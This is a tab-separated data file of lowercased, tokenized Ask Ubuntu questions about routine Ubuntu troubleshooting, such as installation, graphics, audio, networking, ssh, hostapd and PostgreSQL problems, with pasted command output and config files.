389359	installation completed but not saved to hard disk	i am new to ubuntu and am installing ubuntu from a usb stick.i install it and it installs fully and asks me to restart computer and when i do i have to install it again as it doesnt save ubuntu in my hard disk
389364	black screen ( with cursor ) after login ubuntu 13.10	this is not a big annoyance , but i like it when things run smoothly . anyway , with ubuntu 13.10 , after the login screen , i get a black screen with my mouse cursor until the desktop finishes loading . this usually lasts between 15 and 30 seconds . i assume of course that the way it is supposed to be is a small animated 'loading ' icon next to my username until the desktop has finished loading , which is way better aesthetically . $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] rs880 host bridge 00:01.0 pci bridge : hewlett-packard company device 9602 00:04.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 0 ) 00:09.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 4 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 41 ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:16.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 10h processor link control 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880m [ mobility radeon hd 4225/4250 ] 01:05.1 audio device : advanced micro devices , inc. [ amd/ati ] rs880 hdmi audio [ radeon hd 4200 series ] 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) 03:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) thank you for your time .
389365	running a script with cron	when a script is run manually , it works with no errors . the script is to add a user . however when run in cron , i get emails saying : sudo : no tty present and no askpass program specified sorry , try again . sudo : no tty present and no askpass program specified sorry , try again . sudo : no tty present and no askpass program specified sorry , try again . sudo : 3 incorrect password attempts sudo : no tty present and no askpass program specified sorry , try again . sudo : no tty present and no askpass program specified sorry , try again . sudo : no tty present and no askpass program specified sorry , try again . sudo : 3 incorrect password attempts sudo : no tty present and no askpass program specified sorry , try again . sudo : no tty present and no askpass program specified sorry , try again . sudo : no tty present and no askpass program specified sorry , try again . the entry into cron was done via crontab -e .
389367	disk mysteriously full	recently while downloading i was told there was n't enough room to save the file . i have about 120g of music/video/programs that i can see . my system monitor is saying i have 270g used up at this point . anybody know what the rest could be ? i 'm not very ubuntu savvy so simple explanations please ! i 'm using 13.04 i ran du -sch . [ ! . ] * * |sort -and it came up with 117 gb total . when i ran df -h it came up with /dev/sda1 290g 253g 23g 92 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.8g 4.0k 1.8g 1 % /dev tmpfs 364m 808k 363m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.8g 1.9m 1.8g 1 % /run/shm none 100m 80k 100m 1 % /run/user
389370	installing ubuntu 13.x on hp split x2	i want to install ubuntu on my hp split x2 with intel i3 4010y processor . i tried loading using the usb stick . boot is working fine . but it seems to problem with graphics . login screen is not getting displayed . i am not able to check the logs also since the screen is blank . any suggestions for checking logs during boot ?
389371	need help diagnosing ( random ) dark screen	i have seen many threads on ubuntu 12.04 black screen ( actually , mine is really dim screen . i can still see guake terminal popping up the background , everything works fine , the screen is just really dark . ) the problem is that my black screen problem seems very random and i do not know where to start . i 'm just browsing internet , doing normal activity , then the screen flash black -- sometimes it comes back , sometimes it does not . sometimes even after i do a hard reboot , the screen is very dim from the start as well ( on the very first screen where you can get into bios setting ) . it then boots into ubuntu fine , and sometimes if i let it be really long , i can touch the keyboard and wake the screen back to normal . could anyone give me any hint ?
389378	no sound through hdmi after trying other options	hi all recently installed ubuntu 64 bit ... total noob to ubuntu so if anyone can help me in really simple terms how to play sound through my television using the hdmi cable it would be appreciated
389379	torrent problems	i am using ubuntu 13.10 with gnome environment . i installed qbittorrent and removed the base package transmission can any one please tell me how to make qbittorrent a default application to torrents . and also how to download magnetic links with qbittorrent . also the tweaks to make torrent download faster . thanks in advance
389382	command line tool for removing orphaned packages ?	just exactly that . a command line equivalent of gtkorphan ? an ubuntu equivalent of urpme -- auto-orphans ? please do not suggest apt-get autoremove as it 's not exactly the same thing .
389384	launcher not responding to mouse	i am running ubuntu 13.10 and when i `` push '' my cursor against the left edge of the screen the launcher does n't show up like it used to . i am now forced to use the `` super '' ( well , `` windows '' in this case ... ) button on my keyboard to use the launcher . i tried unity tweak tool but everything seems normal . does anyone know how to make that better ? thanks you for your time .
389385	how to disable unused services without using gui ?	i want to disable some unused services like bluetooth service , pulse audio service , speech dispatcher services for embedded platform . i have beagle bone black and xilinx zynq-7000 all programmable soc zc702 evaluation kit . i 'm using linaro-ubuntu 12.10 distro , so how to i disable some above services with using terminal ? thanks .
389386	printer wo n't print	i have a new hpenvy 4500 printer . as soon as i connected it and turned it on it worked , and i printed two ubuntu test pages . then it stopped printing anything from ubuntu although it will print or scan from xp . what cani do ?
389389	what is the username and password to use after installation of kubuntu or ubuntu ?	i have installed kubuntu on my laptop while logged into ubuntu , after it restarted kubuntu login came up , what is the username and password for this .
389390	mp3 playback crackles/pops and sometimes squelches in ubuntu 13.10 64-bit	same issue in banshee , rhythmbox , vlc , and even some ( but not all ) videos from youtube , etc . in chromium . it seems to be strongly related to how many other things are happening on my computer - the more stuff ( compiles , lots of apps open , etc . ) the more pops . highly compressed mp3 files seem to be the worst . i even got some short squeals like sliding a needle across a record sideways . it happens with flac files just a little bit , but much , much less . if i open the mp3 file in audacity , then play , it works as well as a flac file . so , i 'm getting some popping in the audio stream , but 3-10 times as much when it has to convert from mp3 . the flac popping settles down after maybe 10 seconds . it still pops maybe a few times a minute for a few minutes before playing perfectly fine ( or maybe i get used to a very low level of popping ? ) . adding `` tsched=0 '' to the end of the `` load-module module-hal-detect '' line in /etc/pulse/default.pa had no effect . i just upgraded to ubuntu 13.10 - it worked fine in 12.04 . my guess would be a gstreamer or alsa issue , or possibly hardware . if it were hardware , i 'd think mp3 vs. flac would n't matter . i 'd also guess it has something to do with not filling enough of a buffer before trying to play the sound . else why would it get better the longer music is playing ?
389393	log in ubuntu ( it 's in vm box ) using copssh in window7 machine	ip of ubuntu is 10.0.2.15 ( got it by 'ifconfig ' ) , but it seems be 169.254.107.82 ( got it by virtualbox host-only network ) ... .. and in cmd of windows , i ca n't ping to 10.0.2.15 , but can ping to 169.254.107.82 . in ubuntu , i can ping to 192.168.1.104 , and log in it by 'ssh ' . ip of windows is 192.168.1.104 . @ mitesh thanks ! in window7 machine , i installed copssh and ubuntu ( it 's in vitrualbox ) . when i use copssh to log in my ubuntu , some error appear : $ ssh lime @ 169.254.107.82 warning : permanerntly added '169.254.107.82 ' < ecdsa > to the list of know host . permission denied < keyborad-interactive > . in ubuntu , the file of /etc/ssh/sshd_config is that : # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords passwordauthentication yes # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes
389394	laptop not booting correctly / nvidia optimus geforce 610m video card driver problem	i 'm am a new user to ubuntu . i installed ubuntu 12.04 lts 64 bit on my laptop . nothing went wrong with the installation . the problems seems to remain in a video card driver , as i have done my bit of research , and nothing really worked so far . i am using a nvidia optimus card and yes , i know that optimus card are not supported by nvidia or something , geforce 610m to be exact ( not certain ) . at boot instead of the ubuntu splash screen it opens a black screen for a few seconds ( not sure , maybe up to a minute ) saying something along the lines of : '' can not initialize agpgart module drm : fill_in_dev_failed '' i am also not very experienced . so please forgive me for not knowing how to post directly what the error is . if you guys tell me it 's important i 'll try to type it on a paper and then update this post . as far as i 'm aware , i 've tried using nomodeset , installing bumblebee and/or nouveau , and it seems hard to fix . instructions pointing me to undo any possible mistakes i might have done would also be appreciated . edit : also asked on another board , they told me i should post here the translated results for sudo lshw -c display it returned : pci ( sysfs ) *-display unclaimed details : vga compatible controller product : 3rd gen core processor graphics controller manufacturer : intel corporation physical id : 2 bus id : pci @ 0000:00:02.0 version : 09 length : 64 bits clock : 33mhz capabilities : msi pm vga_controller cap_list conffiguration : latency=0 resources : mem贸ria : f1000000-f13fffff mem贸ria : e0000000-efffffff ioport:4000 ( tamanho=64 ) edit2 : fixed after removing nomodeset from the grub options and updating the kernel . tugatech burning board , seriously advise its use ...
389399	setup localhost site in apache ?	i 've been searching for weeks on how to setup the localhost enviroment on ubuntu without any good solutions . this is what i want to achieve : i want to have my root folder as such /home/'username'/sites/'projectname.pl ' or /home/'username'/sites/pl/'projectname'/public ( or simular ) when accessing my localhost i do n't wan na have to write localhost/'projectname'/public ( or whatnot ) i would like to be able to access the project just by typing http : //'projectname'.pl i know this is achievable on the apache server on osx but i have n't been able to find any guides to achieve this on my ubuntu-machine . i would really be grateful of any help , and i really hope it 's possible . regards !
389401	ca n't update ubuntu 13.04 to ubuntu 13.10	i 'm trying to update my ubuntu form 13.04 to 13.10 . i already did the commands apt-get update and apt-get upgrade on terminal . when i open the software updater , it shows that my computer is up to date , but ubuntu 13.10 is available . when i click on button upgrade , nothing happens . any idea what it could be ?
389408	why it is important to securing /dev/shm and /tmp	i see a lot of blogs talking about security and specially how to secure /dev/shm and /tmp i would like to know why it is important to secure these folders ?
389410	ca n't make bootable usb	i 'm trying to create a bootable usb - i get the error message : an error ( ) occured while executing syslinux . your usb drive wo n't be bootable . i 'm using the universal usb installer 1.9.5.1 from pendrive . i 've downloaded ubuntu-12.04.3-desktop-i386.iso any ideas what the problem is ?
389412	change file system state in recovery mode	sorry for the format , but im trying to do this on my smartphone since my ubuntu is down lol . i am trying to run the command sudo apt-get purge nvidia-current in the root shell prompt but i am getting a few errors since i 'm not in write mode . how do i fix this ? my computer keeps booting to a blank screen right before asking for my login after i recently tried updating my nivida drivers .
389417	how to install glc in ubuntu 13.10 ?	i am trying to install glc on ubuntu saucy 13.10 so far without luck . how can i install it ?
389418	after installing firestarter system does n't automatically switch between wired and wireless network	i initially installed firestarter to set up some thing in network and watch if connections to my computer work . i used wizard , which was definitely wrong decision . i use both cable ( and occassionally share connection via wi-fi ) and wi-fi often , and now system does n't switch `` internet source '' automagically : i have to manually open firestarter and re-run wizard every time . how do i revert standard settings ? i suppose i could copy iptables rules from fresh installation , where do i find configs then ?
389422	adding video card and ubuntu stuck on boot	i am working on ubuntu 13.04 and i have radeon 7950 video card working good with the latest amd driver . the problem occurs when i am adding another exactly the same video card now the boot stuck , and even if i am trying to halt it with ctrl + alt + f1 it halt anyway . i 'll appreciate any help on that one . thanks in advance roman
389427	different terminal profiles for different directories/applications	i would like to have my terminal profile change based on either the current directory or the currently running program . is this possible ? if so , how would i accomplish this ?
389428	ubuntu not installing on a 32bit system	as you can see , i have a 32x os , and it works fine , however , when i run the wubi.exe it fails to do anything . my computer processes the .exe and then does absolutely nothing . how do i fix this ?
389430	ca n't login after upgrading from ubuntu 10.04 to 12.04	i can not get the login screen after upgrading .i get error system is running in low graphics mode.then i pressed ok.then run in low session mode for 1 time then nothing appears not even login screen just the 12.04 background and the fan in my laptop makes noise my laptop is samsung rv510 i have partitioned windows 8 and ubuntu .please some 1 help me
389434	bluetooth problems on 13.04 ( dont see bt-devices )	running zorin 7 on ubuntu 13.04 and cant get my bt to work ... it seems that the actual bt device is recognized , but i cant get it to see ( or be seen by ) other devices i downloaded blueman bt manager and bluez here some technical info ( i 'm a linux newby , so bear with me : - ) casa @ casa-inspiron-3421 : ~ $ sudo service bluetooth status [ sudo ] password for casa : bluetooth start/running , process 1113 casa @ casa-inspiron-3421 : ~ $ bluetoothd -d -n bluetoothd [ 27883 ] : bluetooth daemon 4.101 bluetoothd [ 27883 ] : src/main.c : parse_config ( ) parsing main.conf bluetoothd [ 27883 ] : src/main.c : parse_config ( ) discovto=0 bluetoothd [ 27883 ] : src/main.c : parse_config ( ) pairto=0 bluetoothd [ 27883 ] : src/main.c : parse_config ( ) pageto=8192 bluetoothd [ 27883 ] : src/main.c : parse_config ( ) auto_to=60 bluetoothd [ 27883 ] : src/main.c : parse_config ( ) name= % h- % d bluetoothd [ 27883 ] : src/main.c : parse_config ( ) class=0x000100 bluetoothd [ 27883 ] : src/main.c : parse_config ( ) key file does not have key 'deviceid' **d-bus setup failed : connection `` :1.56 '' is not allowed to own the service `` org.bluez '' due to security policies in the configuration file** bluetoothd [ 27883 ] : unable to get on d-bus bluetooth is unblocked both hard and soft ... looks like a conflict here ... any pointers - i do n't know what my on board-bt-device is ( where would i look it up ) ?
389435	iftop how to use ?	iftop is what i downloaded to see my daily internet usage of my computer or any other computer on my lan ( ie bro and sisters usage ) . i want total mb's/day from each computer . so i installed and ran sudo iftop and i get a screen just like the website says i should except , no domains or ip 's or anything , its an empty chart . is there a command i have to tell it to monitor my local network ? i know there 's activity i am surfing right now . yes i read the webpage , no i did not glean a how to use , so it must be that `` common knowledge '' thing i am missing .
389437	how do i get html5 h.264 video working on firefox ?	according the the release notes for firefox 26 , h.264 video should now be working in linux . it does also say the appropriate gstreamer plug-ins need to be installed . does anyone know what these are ? i used this test site and the youtube html5 page to verify that h.264 support works in google chrome on my ubuntu 12.04 64-bit , but does not work on firefox 26 .
389438	trigger play/pause event	one can configure the play/pause key on his/her keyboard to start/pause music of any music player that supports this function . i 'm writing a program that should trigger these events . currently the program calls : rhythmbox-client -- play to start playing music . the problem with this approach is that the user for instance can use nuvola player . how can i trigger a play/pause event ?
389440	update this pls	ca n't install ubuntu on hp series 2000 , blank screen can someone post links again ?
389446	how to manage ubuntu users from php	i have an ubuntu 12.04 server machine in a local net , and i would like to log in my user through php . i have tried with pam_auth ( ) but it was n't configured neither activated for php . i tried a couple of tutorials and now apache does not work . but before that , the only response from pam_auth was a constant `` authentication failure '' . so i decided to do it right this time and ask for the correct `` step by step '' , and reinstall the entire operating system . so my first question should be if pam_auth ( ) is really the best way . if it is , which is the best way to configure it ? does `` www-data '' need a special config ? does any other user need a special config ? thanks for your help ...
389449	how to avoid having new wireless networks be connected to automatically by default	under 12.04.3 , newly added wireless networks will have their `` connect automatically '' box checked by default . is there a way to arrange for this box to be unchecked by default , so i do n't have to remember to go in and uncheck it every time i connect to a new network ? is there another way to prevent automatic reconnections to new wireless networks ? i would consider `` upgrade to 12.10 , 13.04 , etc . '' a valid ( though not preferred ) answer if that will solve the problem .
389450	how do i re-bind a key in ubuntu ?	i went to a keyboard testing site on a laptop that i just installed yesterday . every key worked except for the left arrow key . not only do i not know how to change it , i do n't know how to tell if the key is just flat out broken . first , is there a way to tell if the left arrow key does anything at all ? like check for input ? secondly , how do i re-bind it to do what it is supposed to ?
389451	want to try but have problem	hello guys i am not very good atenglish so i have to ask because i didnt get it from text if its possible ... .the question is i want to try ubuntu but i wan na have windows also..is it possible to install ubuntu and then just switch from ubuntu to win . and from win . to ubuntu ? i have seen something that after installing unbutu there will be something wrong with files on win . ... ... thanks for answer
389456	what might cause programs to randomly disappear ?	i just installed ubuntu on my laptop , and am having all sorts of strange intermittent problems . i 've had unity vanish when restarting , and had to reinstall it twice . i 've had ubuntu software center disappear twice and require a reinstall . terminal has disappeared 3 times . synapse disappeared after a reboot right after i installed it . does anyone know where i might begin in debugging this issue ? edit : ran the command suggested ? start-date : 2013-12-11 13:48:52 commandline : aptdaemon role='role-install-file ' sender=':1.88' install : psmisc : i386 ( 22.20-1ubuntu2 , automatic ) remove : gconf2 : amd64 ( 3.2.6-0ubuntu1 ) , gnome-terminal : amd64 ( 3.6.1-0ubuntu6 ) , compiz-gnome : amd64 ( 0.9.10+13.10.20131011-0ubuntu1 ) , unity : amd64 ( 7.1.2+13.10.20131014.1-0ubuntu1 ) , gnome-terminal-data : amd64 ( 3.6.1-0ubuntu6 ) , compiz : amd64 ( 0.9.10+13.10.20131011-0ubuntu1 ) , psmisc : amd64 ( 22.20-1ubuntu2 ) , gvfs-backends : amd64 ( 1.18.2-0ubuntu1 ) , software-center : amd64 ( 13.10-0ubuntu1 ) end-date : 2013-12-11 13:48:57
389458	what to do when boot-repair warns to change pc from legacy to efi mode ?	on my dual boot machine with preinstalled windows 8 , while trying to setup boot with boot repair it returns info that efi is detected and warns me to change my pc from legacy to efi mode . `` boot-repair extra info '' is at http : //paste.ubuntu.com/6558138/ . what to do to create a dual windows 8/ubuntu boot ?
389459	can not connect to postgresql server	i 'm trying to set up a postgresql server using the instructions found on here . i installed the package via apt-get install postgresql and now i 'm on the step : sudo -u postgres psql postgres which gives the error : psql : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? i 'm guessing the server is n't running but i 'm not sure how to start it . any tips would be much appreciated . update : running service postgresql status does n't output anything , even after sudo service postgresql start . update # 2 : running ps auxw | grep post does n't turn up anything either , so i 'm guessing the server daemon is n't running .
389460	how to delete multiple files ?	i need to select and delete multiple files from ubuntu one , which are synced every time i uninstall and reinstall ubuntu one on my android device . if i delete them from the folder on my computer they are downloaded again next time i boot ubuntu . i need to remove the files but there are more than a 1000 and they are stored in the folder with all my pictures from my phone . so i can not delete the whole folder . how in the world can i delete 1000 files from ubuntu one without selecting them one by one ?
389462	sensors output on my lenovo ideapad y510p does not pick all temperatures and fan speeds	sensors output on my lenovo ideapad y510p does not pick all temperatures and fan speeds . i do not want to control fans , just to monitor their speed ( and temperatures ) . any help ? radenkovich @ b4da55 : ~ $ sensors **acpitz-virtual-0** adapter : virtual device **temp1 : +0.0°c** ( crit = +127.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +51.0°c ( high = +84.0°c , crit = +100.0°c ) core 0 : +51.0°c ( high = +84.0°c , crit = +100.0°c ) core 1 : +47.0°c ( high = +84.0°c , crit = +100.0°c ) core 2 : +49.0°c ( high = +84.0°c , crit = +100.0°c ) core 3 : +49.0°c ( high = +84.0°c , crit = +100.0°c ) pkg-temp-0-virtual-0 adapter : virtual device temp1 : +50.0°c **thinkpad-isa-0000** adapter : isa adapter **fan1 : 0 rpm** radenkovich @ b4da55 : ~ $ sudo sensors-detect # sensors-detect revision 6085 ( 2012-10-30 18:18:45 +0100 ) # system : lenovo 20217 [ lenovo ideapad y510p ] ( laptop ) # board : lenovo viqy0y1 this program will help you determine which kernel modules you need to load to use lm_sensors most effectively . it is generally safe and recommended to accept the default answers to all questions , unless you know what you 're doing . some south bridges , cpus or memory controllers contain embedded sensors . do you want to scan for them ? this is totally safe . ( yes/no ) : module cpuid loaded successfully . silicon integrated systems sis5595 ... no via vt82c686 integrated sensors ... no via vt8231 integrated sensors ... no amd k8 thermal sensors ... no amd family 10h thermal sensors ... no amd family 11h thermal sensors ... no amd family 12h and 14h thermal sensors ... no amd family 15h thermal sensors ... no amd family 15h power sensors ... no intel digital thermal sensor ... success ! ( driver `coretemp ' ) intel amb fb-dimm thermal sensor ... no via c7 thermal sensor ... no via nano thermal sensor ... no some super i/o chips contain embedded sensors . we have to write to standard i/o ports to probe them . this is usually safe . do you want to scan for super i/o sensors ? ( yes/no ) : probing for super-i/o at 0x2e/0x2f trying family `national semiconductor/ite ' ... no trying family `smsc ' ... no trying family `via/winbond/nuvoton/fintek ' ... no trying family `ite ' ... no probing for super-i/o at 0x4e/0x4f trying family `national semiconductor/ite ' ... yes found unknown chip with id 0x8586 some hardware monitoring chips are accessible through the isa i/o ports . we have to write to arbitrary i/o ports to probe them . this is usually safe though . yes , you do have isa i/o ports even if you do not have any isa slots ! do you want to scan the isa i/o ports ? ( yes/no ) : probing for `national semiconductor lm78 ' at 0x290 ... no probing for `national semiconductor lm79 ' at 0x290 ... no probing for `winbond w83781d ' at 0x290 ... no probing for `winbond w83782d ' at 0x290 ... no lastly , we can probe the i2c/smbus adapters for connected hardware monitoring devices . this is the most risky part , and while it works reasonably well on most systems , it has been reported to cause trouble on some systems . do you want to probe the i2c/smbus adapters now ? ( yes/no ) : using driver `i2c-i801 ' for device 0000:00:1f.3 : intel lynx point ( pch ) module i2c-i801 loaded successfully . module i2c-dev loaded successfully . next adapter : nvidia i2c adapter 0 at 1:00.0 ( i2c-0 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 1 at 1:00.0 ( i2c-1 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 2 at 1:00.0 ( i2c-2 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 7 at 1:00.0 ( i2c-3 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 8 at 1:00.0 ( i2c-4 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 11 at 1:00.0 ( i2c-5 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 0 at 7:00.0 ( i2c-6 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 1 at 7:00.0 ( i2c-7 ) do you want to scan it ? ( yes/no/selectively ) : next adapter : nvidia i2c adapter 2 at 7:00.0 ( i2c-8 ) do you want to scan it ? ( yes/no/selectively ) : now follows a summary of the probes i have just done . just press enter to continue : driver `coretemp ' : * chip `intel digital thermal sensor ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers coretemp # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) unloading i2c-dev ... ok unloading i2c-i801 ... ok unloading cpuid ... ok
389463	hostapd is very slow ( at 5mbps )	i 've set up hostapd wifi hotspot but it is working on very low speed . what may be possible cause for this ? windows client shows it is 802.11n but link speed is 5mbps ( and real speed is less than 2mbps ) root @ home : ~ # uname -r 3.8.0-30-generic root @ home : ~ # lspci -v 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : azurewave aw-nb037h 802.11bgn wireless half-size mini pcie card [ ar9002wb-1ngcd ] flags : bus master , fast devsel , latency 0 , irq 28 memory at fe9f0000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 60 ] express legacy endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 00-00-00-00-00-00-00-00 capabilities : [ 170 ] power budgeting < ? > kernel driver in use : ath9k root @ home : ~ # lsmod | grep ath ath9k 149924 0 ath9k_common 14055 1 ath9k ath9k_hw 413629 2 ath9k_common , ath9k ath 23827 3 ath9k_common , ath9k , ath9k_hw mac80211 606457 1 ath9k cfg80211 510937 3 ath , ath9k , mac80211 root @ home : ~ # iwconfig mon.wlan0 ieee 802.11bgn mode : monitor tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off wlan0 ieee 802.11bgn mode : master tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off root @ home : ~ # cat /etc/hostapd/hostapd.conf | egrep -v `` ^ ( # . * ) ? $ '' interface=wlan0 logger_syslog=-1 logger_syslog_level=2 logger_stdout=-1 logger_stdout_level=2 dump_file=/tmp/hostapd.dump ctrl_interface=/var/run/hostapd ctrl_interface_group=0 ssid=poma hw_mode=g channel=1 beacon_int=100 dtim_period=2 max_num_sta=255 rts_threshold=2347 fragm_threshold=2346 macaddr_acl=0 auth_algs=3 ignore_broadcast_ssid=0 wmm_enabled=1 wmm_ac_bk_cwmin=4 wmm_ac_bk_cwmax=10 wmm_ac_bk_aifs=7 wmm_ac_bk_txop_limit=0 wmm_ac_bk_acm=0 wmm_ac_be_aifs=3 wmm_ac_be_cwmin=4 wmm_ac_be_cwmax=10 wmm_ac_be_txop_limit=0 wmm_ac_be_acm=0 wmm_ac_vi_aifs=2 wmm_ac_vi_cwmin=3 wmm_ac_vi_cwmax=4 wmm_ac_vi_txop_limit=94 wmm_ac_vi_acm=0 wmm_ac_vo_aifs=2 wmm_ac_vo_cwmin=2 wmm_ac_vo_cwmax=3 wmm_ac_vo_txop_limit=47 wmm_ac_vo_acm=0 ieee80211n=1 eapol_key_index_workaround=0 eap_server=0 own_ip_addr=127.0.0.1 wpa=3 wpa_passphrase=*** wpa_key_mgmt=wpa-psk wpa-eap wpa_pairwise=tkip ccmp rsn_pairwise=ccmp root @ home : ~ # cat /proc/sys/kernel/random/entropy_avail 2223
389464	how do i fix an ignored update file in ubuntu 13.04 ?	when i am in terminal and i run sudo apt-get update , i get ignored files . what are these , and how do i fix them ?
389469	how do i install and configure grub to dual boot ubuntu and windows ?	i have a lenovo v570 and need to run linux . the steps i took are : delete the small lenovo partition . defragment the hard disk drive shrink the c : boot primary partition download ubuntu lts burn ubuntu to dvd restart computer loading ubuntu from dvd installing ubuntu in a partition in the saved space the system forced a shutdown and i could n't boot ubuntu from the new partition . boot ubuntu from dvd with the try ubuntu option . open the terminal followed the instructions for boot repair noticed that grub ( whatever that does ) is n't installed . told to copy and paste the system information and ask for help . the link to the system information is http : //paste.ubuntu.com/6558233/ how do i configure the system to boot either ubuntu or windows ?
389474	wireless very slow with 13.10 and bcm4313	i have a laptop with the bcm4313 , and it was working perfectly in ubuntu 13.04 , but i recently upgraded to 13.10 and now my wireless performance is horrible . initially it did n't work at all , but i removed the wl driver and use the brcmsmac driver instead . now when i boot up it works at the start , but gets progressively slower . my android device is reporting 10mbps down/20mbps up , but my laptop only gets 1up/down . does anyone know a solution ? i really need my wireless to work , is my best option to just reinstall on 13.04 ? thanks !
389475	unable to change the position of page numbers in a libreoffice impress presentation	my page numbers are not working . they appear in the upper left corner of each slide , but only halfway on the page . how can i reposition the page numbers ? the obvious solution is not working : i 'm able to change the position of the page number field in the master slide , but this has no effect in normal view . i notice that i can insert a new page number field in the master slide , in whatever position i want , but i can ' get rid of the old page number field no matter what , so i end up with two page numbers on every slide .
